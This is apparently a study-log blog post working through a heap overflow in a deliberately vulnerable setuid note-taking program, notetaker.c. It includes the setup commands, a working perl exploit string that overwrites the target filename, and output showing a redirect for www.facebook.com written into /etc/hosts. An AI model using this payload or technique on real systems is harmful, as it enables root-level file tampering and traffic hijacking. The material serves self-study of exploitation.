---
layout: post
title: AoE log entry 4
---

While I ask the audience for help about the symlink, I'm gonna exploit notetaker.c using the same technique. notetaker.c is a multi-user notetaking suid program. It copies user input directly into a 100-byte buffer on the heap. 20 bytes are allocated after the buffer to hold the name of the file to write to---ostensibly /var/notes, but not for long!

Unlike simplenote.c, no newline is added at the end of the buffer after strcpy. Also unlike simplenote.c, the real user ID of the executing user is written on its own line before the note+\n is written. So, I need to write to a file than can tolerate a line with some int and a newline before the line I try to inject. But at least I don't have to deal with filenames that end in newlines.

Again, I get an implicit declaration warning for getuid, write, and close when compiling notetaker.c. Include unistd.h and good to go.
```
gcc -o notetaker notetaker.c
sudo chown root:root ./notetaker
sudo chmod u+s ./notetaker
```

From gdb, buffer and datafile are allocated the same addresses on the heap as before, 0x555555757010 and 0x555555757080, 112 bytes apart. Woo, I can reuse my previous exploit string (assuming /etc/hosts won't choke on the line with the uid).
```
./notetaker "$(perl -e 'print "sketchy.ip.address www.facebook.com # " . "A"x74 . "/etc/hosts"')"
[DEBUG] buffer   @ 0x562bf9abc010: 'sketchy.ip.address www.facebook.com # AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/hosts'
[DEBUG] datafile @ 0x562bf9abc080: '/etc/hosts'
[DEBUG] file descriptor is 3
Note has been saved.
```
BAM. How's that? Let's look at /etc/hosts.
```
...
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
<E8>^C^@^@
sketchy.ip.address www.facebook.com # AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/hosts
```
<E8>... is the userid. Let's see if navigating to facebook takes us to sketchy.ip.address. I'm guessing I might have to replace sketchy IP address with something real enough, some local address, or maybe just localhost.

Kcchhhhhxxxxx, rewind to simplenote.c. Got some pointers:
* reread man pages for any functions I have control over (i.e. can pass input to) very carefully
* reread man ln and look for associated links
* read man symlink, man -k symlink

